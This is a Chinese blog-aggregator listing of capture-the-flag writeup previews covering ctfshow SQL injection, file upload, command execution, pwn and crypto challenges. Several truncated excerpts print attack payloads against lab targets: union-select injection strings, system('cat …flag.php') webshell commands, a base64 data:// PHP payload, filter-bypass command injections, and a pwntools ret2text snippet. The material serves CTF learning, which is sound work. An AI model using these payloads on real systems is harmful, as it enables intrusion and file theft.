WriteUp:CTFshow

ctfshow- sql注入(web入门)

目录web171web172web173web174web175WEB176web177web178web179web180web181—182(180也可以用)web183web184web171简单的注入//查表名payload="1'unionselect1,2,group_concat(table_name)frominformation_schema.tableswheretable_s
ZredamanJ·2023-11-14 20:43

【CTF】CTFshow-SQL注入(持续更新)

【CTF】CTFshow-SQL注入(持续更新)就剩一年的大学时光了,最近也很迷茫,想找实习,又得考托福,又想提前开始毕设,假期前又要上学校安排的实训,马上还又有一门考试,事情一堆,但又感觉整天不知道自己应该做什么
Sunny-Dog·2023-11-14 20:12

ctfshow-sql注入-超详解(172-200)

前言今天是2021/7/25,正式进入sql注入专题,目标:加强python的学习,达到通过写python脚本,加快注入速度的程度,掌握sql在php编程中的一系列查询语句。新手区可以看看Y4师傅以前记录的小笔记SQL注入之MySQL注入的学习笔记(一)SQL注入之MySQL注入学习笔记(二)2021-7-25web172、web173——hex()、to_base64()查询语句//拼接sql语
Yn8rt·2023-11-14 20:42

CTFSHOW-SQL注入-二

title:CTFSHOW-SQL注入(二)date:2021-09-2509:32:11tags:CTF-WEBCTFSHOW-SQL注入(二)这里是ctfshowsql注入的第二篇题目:214-250
k1he·2023-11-14 20:42

CTFSHOW-WEB入门-SQL注入

文章目录前言web171web172web173web174web175web176web177web178web179web180web181-182web183web184web185-186web187web188web189web190web191web192web183web184堆叠注入前言最近发现对sql注入的相关知识点有点生疏和忘记了,做做ctfhshow的sql注入来巩固和学习一
天问_Herbert555·2023-11-14 20:41

ctfshow web-2(sql注入)

原题:ctf.show因为本人也是刚学sql注入,所以会尽可能的写的详细一点-------------------------------------------------1.判断是否可以进行sql注入关于进行sql注入的方法有三种。第一种:整型注入,单引号字符型注入,双引号字符型注入。我们首先使用万能账密的方式来一个一个试属于那种注入。关于万能账密,不是一个真实的账密,而是给出一个100%正确
花名咖啡·2023-11-14 20:39

CTFSHOW 文件上传

web151JS前端绕过直接上传png的图片马然后抓包修改为phpa=system("ls/var/www/html");a=system("cat/var/www/html/flag.php");web152和151一样的方法也可以实现上传a=system("ls/var/www/html");a=system("cat/var/www/html/flag.php");web153.user.i
双层小牛堡·2023-11-14 20:37

CTFshow-sql注入---弱类型转换

//拼接sql语句查找指定ID用户$sql="selectpassfromctfshow_userwhereusername={$username}";//返回逻辑//用户名检测if(preg_match('/and|or|select|from|where|union|join|sleep|benchmark|,|\(|\)|\'|\"/i',$username)){$ret['msg']='用
Flowers_beicheng·2023-11-14 20:37

ctfshow---sql注入(214-253)

目录web214web215web216web217web218web219web220web221web222web223web224web225web226web227web228-229-230web231web232web233-234web235-236web237web238web239web240web241web242web243web244web245web246web247we
T6...·2023-11-14 20:35

WEB ---- ctfshow ----- SQL注入

web171看题目$sql="selectusername,passwordfromuserwhereusername!='flag'andid='".$_GET['id']."'limit1;";//拼接sql语句查找指定ID用户我们能够控制的只有id的值,经分析,条件为username不为flag。可是只有用户名为flag才能输出正确的flag。第一步先判断是否有注入点。观察到存在单引号,所以
@See you later·2023-11-14 20:04

ctfshow---sql注入(171-213)

目录web171web172web173web174web175web176web177web178-179web180-182web183web184web185-186web187web188web189web190web191web192web193web194web195web196web197web198web199-200web201web202web203web204web205we
T6...·2023-11-14 20:04

CTFSHOW-sql注入

web171最简单的sql注入,先演示基本操作payload:-1'unionselect1,2,database()--+//得到数据库名为ctfshow_web-1'unionselect1,2,group_concat
超级兵_140·2023-11-14 20:33

CTFSHOW -SQL 注入

CTFshowsql注入上篇(web171-220)更新中-掘金【精选】CTFshow-WEB入门-SQL注入(上)_having盲注_bfengj的博客-CSDN博客web171基本联合注入拿到题目我们已经知道了是
双层小牛堡·2023-11-14 20:00

2022 长安杯 writeup

检材一问的是检材1的sha256,可以直接对检材计算,如果对磁盘做镜像的话,得到另外一个hash值(此处也算对)jar包存放目录,一是可以看历史命令,二是搜索,使用命令fina/-name"*.jar",查找所有以jar结尾的文件7000端口的文件名。在历史命令中,可以看到使用了一个shstart_web.sh的脚本,后来通过rm的命令给删掉了,所以需要过滤历史命令。思路一是找到所有jar包,查看
0xac001d09·2023-11-14 15:59

buuoj Pwn writeup 171-175

171wdb_2018_1st_babyheapaddedit只能编辑三次。showfree简单的uaf。我们可以通过unlink来泄露地址,劫持free_hook。要注意的是它自己写的一个输入函数。要么就回车截断,要么就输入32个。所以我们在写exp的时候如果是32字节,就不要加回车,如果不够32个字节,就一定要加回车,不然输入是截断不了的。先通过doublefree泄露地址,然后把heap_b
yongbaoii·2023-11-14 15:44

ctfshow sql171-179

mysql先打开我们本地的mysql,可以看到这些数据库information_schemainformation_schema库:是信息数据库,其中保存着关于MySQL服务器所维护的所有其他数据库的信息比如数据库名,数据库表,SCHEMATA表:提供了当前MySQL实例中所有的数据库信息,showdatabases结果取之此表TABLES表:提供了关于数据中表的信息COLUMNS表:提供了表中的
木…·2023-11-14 10:42

buuoj 神秘龙卷风 writeup

题目(十八):【题型】Misc【题目】神秘龙卷风【来源】(buuoj)https://buuoj.cn/challenges#%E7%A5%9E%E7%A7%98%E9%BE%99%E5%8D%B7%E9%A3%8E【思路】破解密码,翻译密码【具体步骤】Step1:将文件解压后发现里面还有一个压缩包,但是被加密了。Step2:根据题目的提示,这个压缩包的密码应该是一个4位的数字,将文件放到arch
22的卡卡·2023-11-14 08:54

buuoj 荷兰宽带数据泄露 writeup

题目(二十四):【题型】Misc【题目】荷兰宽带数据泄露【来源】(buuoj)https://buuoj.cn/challenges#%E8%8D%B7%E5%85%B0%E5%AE%BD%E5%B8%A6%E6%95%B0%E6%8D%AE%E6%B3%84%E9%9C%B2【思路】运用RouterPassView查看密码。【具体步骤】Step1:打开发现是一个config.bin文件,根据题目
22的卡卡·2023-11-14 08:54

攻防世界 pwnstack writeup

题目(六):【题型】PWN【题目】pwnstack【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list【思路】栈溢出【具体步骤】Step1:checksec一下,发现程序是一个只有NX的64位程序Step2:将程序放到IDApro下进行静态分析。Step3:发现main函数,f5查看伪代码(如果键被占用,fn+f5)。Step4:进入vuln(
22的卡卡·2023-11-14 08:54

攻防世界 baby——web writeup

题目(九):【题型】web【题目】baby_web【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list【思路】查看初始页面【具体步骤】Step1:查看URL再根据提示,猜测是需要找到初始页面。Step2:输入index.php,发现自动跳转到了1.php.Step3:用burpsuite进行抓包。Step4:将抓包得到的发送到repeater,
22的卡卡·2023-11-14 08:24

CSAPP-buflab

实验环境和工具ubuntu12.04.5(32位);gdb7.4;实验内容及操作步骤准备工作阅读Readme.txt和buflab-writeup.pdf的前几页按照Readme.txt的要求,任意输入一个
Yuhan_2001·2023-11-12 22:46

CTFshow—爆破、命令执行

Web入门:爆破:web24伪随机数通过mt_srand()分发种子(播种),有了种子后随机数也就确定了(随机就那一组了,因此说伪随机)mt_scrand()//播种MersenneTwister随机数生成器。mt_rand()//生成随机数详细请参考:php伪随机数解题脚本:web28要求扫描目录扫描这两个目录,各从0到100但扫描时注意不能加上2.txt否则就是扫描文件了,而不是扫描目录一般目
D.MIND·2023-11-12 10:47

攻防世界 web php include,XCTF攻防世界 Web Writeup (持续更新中)

新手练习区view-sourceF12得到flag。get_postHackBar一把梭。robots访问robots.txt发现隐藏文件,进入该文件获得flag。backupindex.php的备份文件应该是index.php.bak,访问一下发现果然是,用记事本打开下载的文件得到flag。cookie看一下请求头发现cookie.php访问cookie.php,在响应头中有flag。disab
孙绿·2023-11-11 04:51

CTFHub RCE(命令执行、文件包含) WriteUP

点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介CTFHub为网络安全工程师提供网络安全攻防技能培训、实战、技能提升等服务。「赛事中心」提供全网最全最新的CTF赛事信息,关注赛事定制自己专属的比赛日历吧。「技能树」提供清晰的CTF学习路线,想要变强就加点,哪里不会点哪里。「历年真题」提供无限次赛后复盘,边学边练。「工具」提供各类常用工具,打仗没有一把趁手的武器怎么
TaibaiXX1·2023-11-09 16:32

ctfshow之_萌新web1至web7

一、访问在线靶场ctfshowctf.showhttps://ctf.show/challenges如下图所示,进入_萌新赛的web1问题:如上图所示,页面代码提示id=1000时,可以查询到flag,进行如下尝试:如下图所示,传入参数id=1时,显示出了标题(title)和内容(content)。如上图所示,可以看到查询sql语句,尝试使用id=1orid=1000,截图如下:如上图所示,只显示
XiaoXiao_RenHe·2023-11-08 22:30

mysql %3c%3e语句优化_CTF从入门到成仙,40道bugku Write Up,看完还有什么操作搞不定! ......

CTF从入门到成仙,40道bugkuWriteUp,看完还有什么操作搞不定!本文原创作者:Passerby2,本文属i春秋原创奖励计划,未经许可禁止转载!
快乐的山歌·2023-11-08 10:04

MoeCTF 2020 Write Up for RxEncode

MoeCTF2020WriteUpByHorizonChaser,aka.Horizon第一次参加CTF,现学现用,会做的题实在有限,先把Reverse的RxEncode的题解写下来,其他的题解也正在更新不会的题就等各位巨佬的
HorizonChaser·2023-11-06 23:59

BUUCTF MISC Writeup Part3 <困难>

BUUCTFMISCWriteupPart3100分以上的题目了,挑战一下自我,学到更多知识。
Arklight·2023-11-06 13:40

Hackergame2020 wp

https://github.com/ustclug/hackergame2020-writeups
落雪wink·2023-11-05 19:56

[Tcache]LCTF2018 PWN easy_heap

https://github.com/LCTF/LCTF2018/tree/master/Writeup/easy_heap参考https://www.360zhijia.com/anquan/443460
HAPPYers·2023-11-05 02:32

【CTFWriteup】2020金融密码杯

Mathematical50分小张是某金融科技公司的运维人员,最近遇到了一件烦心事,自己维护的服务器明文密码忘记了,但是找到了明文对应密文的加密算法,通过分析以下脚本,你能帮小张找回服务器密码吗?答案请用flag{密码}表示,例如flag{pass1234}。fromcrypto.Utilimportnumberfromgmpy2import*fromsecretimportflage=65537
来自天空的马匹·2023-11-03 01:23

攻防世界-android-app-100

那两个函数不知道,肯定解不出来,然后学习大佬的writeup吧。从代码中可知,加载了一个库,而且两个函数都是nat
S1lenc3·2023-11-02 13:47

moctf misc writeup

1.我可是黑客2.假装安全3.扫扫出奇迹4.光阴似箭5.杰斯的魔法6.流量分析7.女神的告白8.捉迷藏9.是兄弟就来干我10.百变flag11.蒙娜丽萨的微笑12.李华的双十一1.我可是黑客打开题目是一张图片,保存到本地,即:一般第一题都是签到题,所以直接用nodepad++打开,在文档的最后面发现flag。moctf{e4sy_1ma9e_m1sc}2.假装安全同上题,先将图片保存到本地,再用n
烟敛寒林o·2023-11-01 23:46

ctfshow-web入门命令执行29-36

29源代码给了禁用flag使用tac、nl?c=echo`nlf*`;?c=echo`tacf*`;30多禁用了system和php和上题区别不大,使用上一题命令就能解?c=echo`nlf*`;?c=echo`tacf*`;31禁用了空格使用%09代替?c=echo%09`tac%09f*`;32禁用了echo使用php伪协议?c=include$_GET["1"]?>&1=php://filt
一本正经光头强·2023-11-01 17:49

ctfshow-web入门37-52

include($c);表达式包含并运行指定文件。使用data伪协议?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs/Pg==是base64加密源代码查看得到flag38多禁用了php和file。不会改变伪协议,继续使用上一题
一本正经光头强·2023-11-01 16:40

ctfshow_rsa刷题记录

ctfshow-rsa刷题记录1.easyrsa72.easyrsa83.funnyrsa24.unusualrsa11.easyrsa7已知信息:e,n,c,p的高位。
te_mgl·2023-11-01 02:43

[SWPUCTF 2021 新生赛]hardrce_3 无字母rce 自增

这里直接可以在之前ctfshow的yu师傅那边拿payload因为都是,assert($_POST[_]);$_=[];$_=@"$_";$_=$_['!'
双层小牛堡·2023-10-31 15:13

2022浙江省大学生信息安全竞赛技能赛初赛Writeup

文章目录miscmisc1-好怪哦misc2-神奇的棋盘misc3-segmentFlowwebweb1web2-nisc_学校门户网站web3-吃豆人rere1-ManyCheck前言:misc浅浅ak了一下,misc2一血misc3二血,最高冲上了第5,不过后来还是嘎嘎掉到第9,crypto和pwn一道没出真的太菜了(希望周末决赛能好好加油!miscmisc1-好怪哦拖到010观察得到是逆置的
是toto·2023-10-31 07:03

2023年四川省网络与信息安全技能大赛 决赛个人赛Writeup

文章目录Web前端验证PHP_TryMiscHelloWorld密码在这easy_logCryptobaser线下“断网”CTF个人赛,题都很简单(新手级难度),总共10道题目,解了6题。赛题附件请自取:链接:https://pan.baidu.com/s/1lgNEBO7a1L4KLE2t_pXoow提取码:mochWeb前端验证就简单的绕过前端验证,DisableJavaScript插件直接一
末 初·2023-10-31 07:32

CTFHub | MySQL流量、Redis流量、MongoDB流量的WriteUp

文章目录MySQL流量题目题解Redis流量题目题解MongoDB流量题目题解数据库类流量题需要用到Wireshark截取数据包,然后进行分析。WireShark是非常流行的网络封包分析工具,可以截取各种网络数据包,并显示数据包详细信息。常用于开发测试过程中各种问题定位。软件下载官网安装使用传送门下面我们来看三道数据库流量题吧。MySQL流量题目附件:题解打开Wireshark,选择附件,打开(或
剑心诀·2023-10-30 11:05

SWPU新生赛2021 Pwn部分WriteUp

第一波放题nc签到不能有’cat’,‘ls’,’‘,‘cd’,‘echo’,’<’,’${IFS}’这很web直接绕就行tac$IFS$1flaggift_pwnret2textfrompwnimport*p=remote('1.14.71.254','28057')p.sendline('a'*(0x10+8)+p64(0x4005b6))p.interactive()whitegive_pwn
是Mumuzi·2023-10-29 07:01

SWPU新生赛2021 Crypto部分WriteUp

第一波放题crypto1直接谷歌搜e1e2=3087n=p*q,找到striving的博客,不愧是密码神由于striving的旧博客域名已过期,因此就不放密码神的博客了c1=46363407097182144969801282763157266530258921386852149185503896687900578439730938992292683802859812279518758436135
是Mumuzi·2023-10-29 07:01

UUCTF2022-Writeup

UUCTF2022Writeup前言这个比赛出题的难度很适中,质量很高,但是Web基本不太会(没肝hhhhhh),有一些题还可以的Webwebsign页面上禁用了右键,根据提示在url中输入view-source
1vyyyyyy·2023-10-29 07:28

安全练兵场Writeup(七) | ATT&CK实战靶场

文章来源|MS08067安全练兵场知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,
Ms08067安全实验室·2023-10-28 05:41

实战ATT&CK攻击链路--靶场Writeup(二)

文章来源|MS08067安全练兵场知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,
Ms08067安全实验室·2023-10-28 05:40

安全练兵场Writeup(五) | ATT&CK实战靶场

文章来源|MS08067安全练兵场知识星球本文作者:godunt(安全练兵场星球合伙人)玩靶场认准安全练兵场成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,
Ms08067安全实验室·2023-10-28 05:40

实战ATT&CK攻击链路--靶场Writeup(一)

文章来源|MS08067安全练兵场知识星球本文作者:godunt(安全练兵场星球合伙人)成立"安全练兵场"的目的目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,提供优质的靶场系列,
Ms08067安全实验室·2023-10-28 05:10

2023 ciscn web部分题解

unzip软链接参考文章奇安信攻防社区-2021深育杯线上初赛官方WriteUp-Web篇构造payload:先构造一个指向/var/www/html的软连接(因为html目录下是web环境,为了后续可以
GXcodes·2023-10-27 00:36

2023羊城杯-writeup-web

WebD0n’tpl4yg4m3!!!$rce2=$this->exp[$rce2];}publicfunction__toString(){call_user_func('system',"cat/flag");}}classYang{publicfunction__call($name,$ary){if($this->key===true||$this->finish1->name){if($
Nacl_122·2023-10-27 00:32

CTFHUB--WEB进阶

LD_PRELOAD  这个题目一开始就不是特别的懂,看了一些writeup之后才渐渐明白这题目所考察的知识点,下面就来讲讲吧。题目开始就提示我们要用LD_PRELOAD,这个是什么东西呢?
小蓝同学`·2023-10-25 22:21
上一页 4 5 6 7 8 9 10 11 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他